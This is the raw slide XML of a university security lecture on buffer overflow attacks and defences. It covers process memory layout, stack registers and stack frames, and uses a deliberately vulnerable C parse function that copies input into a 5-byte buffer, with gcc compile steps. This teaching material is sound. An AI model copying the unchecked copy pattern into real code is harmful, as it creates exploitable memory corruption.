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308" r:id="rId11"/>
    <p:sldId id="345" r:id="rId12"/>
    <p:sldId id="342" r:id="rId13"/>
    <p:sldId id="344" r:id="rId14"/>
    <p:sldId id="346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  <p:sldId id="275" r:id="rId54"/>
    <p:sldId id="276" r:id="rId55"/>
    <p:sldId id="277" r:id="rId56"/>
    <p:sldId id="278" r:id="rId57"/>
    <p:sldId id="279" r:id="rId58"/>
    <p:sldId id="280" r:id="rId59"/>
    <p:sldId id="281" r:id="rId60"/>
    <p:sldId id="282" r:id="rId61"/>
    <p:sldId id="283" r:id="rId62"/>
    <p:sldId id="284" r:id="rId63"/>
    <p:sldId id="285" r:id="rId64"/>
    <p:sldId id="286" r:id="rId65"/>
    <p:sldId id="287" r:id="rId66"/>
    <p:sldId id="288" r:id="rId67"/>
    <p:sldId id="289" r:id="rId68"/>
    <p:sldId id="290" r:id="rId69"/>
    <p:sldId id="291" r:id="rId70"/>
    <p:sldId id="292" r:id="rId71"/>
    <p:sldId id="293" r:id="rId72"/>
    <p:sldId id="294" r:id="rId73"/>
    <p:sldId id="295" r:id="rId74"/>
    <p:sldId id="296" r:id="rId75"/>
    <p:sldId id="297" r:id="rId76"/>
    <p:sldId id="298" r:id="rId77"/>
    <p:sldId id="299" r:id="rId78"/>
    <p:sldId id="300" r:id="rId79"/>
    <p:sldId id="301" r:id="rId80"/>
    <p:sldId id="302" r:id="rId81"/>
    <p:sldId id="303" r:id="rId82"/>
    <p:sldId id="304" r:id="rId83"/>
    <p:sldId id="305" r:id="rId84"/>
    <p:sldId id="306" r:id="rId85"/>
    <p:sldId id="325" r:id="rId86"/>
    <p:sldId id="307" r:id="rId87"/>
    <p:sldId id="340" r:id="rId88"/>
    <p:sldId id="341" r:id="rId89"/>
    <p:sldId id="257" r:id="rId9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12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E9559-D168-F64D-B778-1F30AF0F3802}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>03/04/17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8411B-AB9F-024C-8513-BAAC3FBB0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07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9DCDB-C6DE-174F-AB9C-CB119D5B5F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6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CC18-54C8-3846-87F2-5FC815EB2E80}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>03/04/17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6917D-A3B8-CE42-9276-98E431F0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7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CC18-54C8-3846-87F2-5FC815EB2E80}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>03/04/17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6917D-A3B8-CE42-9276-98E431F0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CC18-54C8-3846-87F2-5FC815EB2E80}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>03/04/17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6917D-A3B8-CE42-9276-98E431F0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60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CC18-54C8-3846-87F2-5FC815EB2E80}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>03/04/17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6917D-A3B8-CE42-9276-98E431F0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39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CC18-54C8-3846-87F2-5FC815EB2E80}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>03/04/17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6917D-A3B8-CE42-9276-98E431F0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0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CC18-54C8-3846-87F2-5FC815EB2E80}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>03/04/17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6917D-A3B8-CE42-9276-98E431F0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CC18-54C8-3846-87F2-5FC815EB2E80}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>03/04/17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6917D-A3B8-CE42-9276-98E431F0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4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CC18-54C8-3846-87F2-5FC815EB2E80}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>03/04/17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6917D-A3B8-CE42-9276-98E431F0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73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CC18-54C8-3846-87F2-5FC815EB2E80}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>03/04/17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6917D-A3B8-CE42-9276-98E431F0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88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CC18-54C8-3846-87F2-5FC815EB2E80}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>03/04/17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6917D-A3B8-CE42-9276-98E431F0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15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9CC18-54C8-3846-87F2-5FC815EB2E80}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>03/04/17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6917D-A3B8-CE42-9276-98E431F0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18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9CC18-54C8-3846-87F2-5FC815EB2E80}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>03/04/17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6917D-A3B8-CE42-9276-98E431F0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40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vu.nl//~herbertb/download/papers/anc_ndss17.pdf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rypto.stanford.edu/cs155/papers/formatstring-1.2.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://phrack.org/issues/57/9.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cs.vu.nl//~herbertb/download/papers/anc_ndss17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hrack.org/issues/49/14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366FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buffer Overflow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Attacks &amp; Defenses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41854" y="6611779"/>
            <a:ext cx="4668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Slides are borrowed from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>Franziska</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>Roesner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t> @UW and Dawn Song @Berkeley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7862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254000"/>
            <a:ext cx="9144000" cy="14700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Linux (32-bit) process memory layout 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574371"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3019287" y="1322537"/>
          <a:ext cx="2992389" cy="48270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992389"/>
              </a:tblGrid>
              <a:tr h="54925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Reserved</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> for </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Kernal</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/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4925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user</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> stack</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/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</a:tr>
              <a:tr h="961661"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754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shared libraries</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/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</a:tr>
              <a:tr h="373979">
                <a:tc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66576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run time</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> heap</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/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5617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static data</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> segment</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="1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5617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text </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>segment (program)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="1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0822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unused</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/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507463" y="1651966"/>
            <a:ext cx="7126311" cy="4659150"/>
            <a:chOff x="507463" y="1651966"/>
            <a:chExt cx="7126311" cy="4659150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5925366" y="1651966"/>
              <a:ext cx="1708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 New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>-0xC0000000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25366" y="3579505"/>
              <a:ext cx="1708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 New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>-0x40000000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25365" y="5554224"/>
              <a:ext cx="1708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 New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>-0x08048000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25248" y="2239190"/>
              <a:ext cx="676087" cy="36933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%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US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esp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Down Arrow 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4269253" y="2417809"/>
              <a:ext cx="484631" cy="246888"/>
            </a:xfrm>
            <a:prstGeom prst="downArrow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Up Arrow 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4272235" y="3930915"/>
              <a:ext cx="480857" cy="246580"/>
            </a:xfrm>
            <a:prstGeom prst="upArrow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Up Arrow 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4264348" y="3139448"/>
              <a:ext cx="480857" cy="246580"/>
            </a:xfrm>
            <a:prstGeom prst="upArrow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17" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2401335" y="2423856"/>
              <a:ext cx="573662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908426" y="3978954"/>
              <a:ext cx="492443" cy="36933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r"/>
              <a:r>
                <a:rPr lang="en-US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brk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2400869" y="4163620"/>
              <a:ext cx="573662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07463" y="5103028"/>
              <a:ext cx="1892941" cy="36933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Loaded from exec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Left Brace 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2398812" y="4856158"/>
              <a:ext cx="576185" cy="890644"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrac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24899" y="5941784"/>
              <a:ext cx="1708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 New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>-0x00000000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920987" y="1114449"/>
            <a:ext cx="170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-0xFFFFFFFF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0729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0"/>
            <a:ext cx="4956679" cy="6858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5957430" y="1492720"/>
            <a:ext cx="1990174" cy="14272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957430" y="3352073"/>
            <a:ext cx="2461531" cy="798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952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Registers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%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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> current stack pointer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solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>base pointer for the current stack frame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31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Registers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When you call a function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, typically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space is reserved on the stack for local variables.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endParaRPr lang="en-US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 smtClean="0"/>
              <a:t>This space is usually referenced via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(all local variables and function parameters are a known constant offset from this register for the duration of the function call.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1765107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Registers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%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, on the other hand, will change during the function call as other functions are called, or as temporary stack space is used for partial operation results.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Most compilers have an option to reference all local variables through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>%esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. This frees up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>for use as a general purpose register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So </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>will point to the top of you stack, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>will point to the next available byte on the stack (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Stacks usually </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-I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but not necessarily </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-I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grow down in memory.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05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100" y="562584"/>
            <a:ext cx="2649526" cy="5870166"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
              <a:alpha val="41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25400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3366FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Stack Frame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540496"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="259451" y="613897"/>
          <a:ext cx="1476016" cy="592822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76016"/>
              </a:tblGrid>
              <a:tr h="2379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user</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> stack</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/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961661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5754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shared libraries</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/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3979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11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run time</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> heap</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/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3046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static data</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> segment</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1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1049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text </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>segment (program)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean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0822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unused</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"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879613" y="471999"/>
            <a:ext cx="1968856" cy="6194985"/>
            <a:chOff x="4367631" y="1027137"/>
            <a:chExt cx="3991546" cy="6194985"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5925365" y="1027137"/>
              <a:ext cx="24338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/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>-0xC0000000</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New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25364" y="4703858"/>
              <a:ext cx="24338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/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>-0x40000000</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New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25364" y="6626412"/>
              <a:ext cx="24338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/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>-0x08048000</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Down Arrow 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4372535" y="3529703"/>
              <a:ext cx="484632" cy="246888"/>
            </a:xfrm>
            <a:prstGeom prst="downArrow">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4F81BD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Up Arrow 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4375517" y="4988930"/>
              <a:ext cx="480857" cy="246580"/>
            </a:xfrm>
            <a:prstGeom prst="upArrow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Up Arrow 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4367631" y="4251342"/>
              <a:ext cx="480857" cy="246580"/>
            </a:xfrm>
            <a:prstGeom prst="upArrow">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4F81BD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24900" y="6945123"/>
              <a:ext cx="24338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urier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>-0x00000000</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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46785"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3903739" y="860504"/>
          <a:ext cx="3511798" cy="53909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3511798"/>
              </a:tblGrid>
              <a:tr h="105055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9407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arguments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927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return address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4495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stack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frame pointer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56447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exception handlers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62719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local variables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35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tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>callee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saved registers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019194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5" name="Left Brace 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2806303" y="852916"/>
            <a:ext cx="972015" cy="5378209"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 118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1771576" y="1393619"/>
            <a:ext cx="1034727" cy="1881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37" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7420844" y="643718"/>
            <a:ext cx="12700" cy="2805289"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 457778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58845" y="3264341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605889" y="1221052"/>
            <a:ext cx="144966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To previous stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> frame pointer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400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920789"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="241454" y="1320129"/>
          <a:ext cx="1517750" cy="32003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517750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7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7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7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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Elbow Connector 23"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="25" idx="3"/>
            <a:endCxn id="29" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1741151" y="3036930"/>
            <a:ext cx="5646950" cy="2915020"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -654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526102" y="2852264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959328" y="3991998"/>
            <a:ext cx="193383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To  the point at which</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> this function was called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879152" y="5767284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84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40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25400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3366FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Stack Frame</a:t>
            </a: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959709" y="2675686"/>
            <a:ext cx="5346086" cy="319882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9:int parse(FILE *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10:  char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[5], *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[128];</a:t>
            </a:r>
          </a:p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11: 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fread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1,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128,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algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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12: 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 algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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13:  if (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[0] == ‘G’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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14:    if (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[1] == ‘E’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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15:      if (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[2] == ‘T’)</a:t>
            </a:r>
          </a:p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16:        if (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[3] == ‘ ’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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17:         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1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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18:  if (!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return -1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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19: 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+ 4;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="9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20:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1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6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b="1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6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b="1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6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21: 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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a: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1962024" y="798495"/>
            <a:ext cx="5343770" cy="186923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1:void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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6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(char* in, char* out) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16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2:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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6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16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3:  while (in[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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]!=‘\0’ &amp;&amp; in[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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]!=‘n’) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16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4:    out[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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6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tolower</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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(in[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"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5:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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++;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16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6:  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16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7:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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6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6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‘\0’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16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8:}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76743" y="5974044"/>
            <a:ext cx="3433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 quick example to illustrate multiple stack frames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8121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13044" y="1834550"/>
            <a:ext cx="4201615" cy="46255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25400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Viewing Stack Frame with GDB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4967759" y="3710560"/>
            <a:ext cx="3887992" cy="2422201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9:int parse(FILE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10:  char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[5],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[128];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11: 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fread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1,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128,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13:  if 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[0] == ‘G’)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14:    if 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[1] == ‘E’)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15:      if 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[2] == ‘T’)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16:        if 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[3] == ‘ ’)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17:        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1;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18:  if (!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return -1;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19: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+ 4;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20:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1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b="1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b="1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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a: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4967759" y="2272407"/>
            <a:ext cx="3887992" cy="1425005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1:void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(char* in, char* out) {</a:t>
            </a:r>
          </a:p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2: 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3:  while (in[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]!=‘\0’ &amp;&amp; in[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]!=‘n’) {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4:    out[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tolower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(in[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]);</a:t>
            </a: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5:   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++;</a:t>
            </a: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6:  }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7: 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‘\0’;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8:}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0" y="965145"/>
            <a:ext cx="21557" cy="56419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25420" y="1803189"/>
            <a:ext cx="4170261" cy="752637"/>
            <a:chOff x="125420" y="1803189"/>
            <a:chExt cx="4170261" cy="752637"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="141099" y="1865910"/>
              <a:ext cx="4154582" cy="68991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21173" y="2069747"/>
              <a:ext cx="337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 New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>gcc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t> –g </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>parse.c</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t> –o parse</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New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420" y="1803189"/>
              <a:ext cx="1035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Compile:</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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5363" y="2849342"/>
            <a:ext cx="4185941" cy="784328"/>
            <a:chOff x="105363" y="2755262"/>
            <a:chExt cx="4185941" cy="784328"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="TextBox 36"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2835286" y="3170258"/>
              <a:ext cx="8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6722" y="2817982"/>
              <a:ext cx="4154582" cy="67863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9766" y="3006139"/>
              <a:ext cx="115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 New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>./parse</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New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5363" y="2755262"/>
              <a:ext cx="626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Run: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1043" y="3899897"/>
            <a:ext cx="4165884" cy="2863161"/>
            <a:chOff x="121043" y="3743097"/>
            <a:chExt cx="4165884" cy="2863161"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
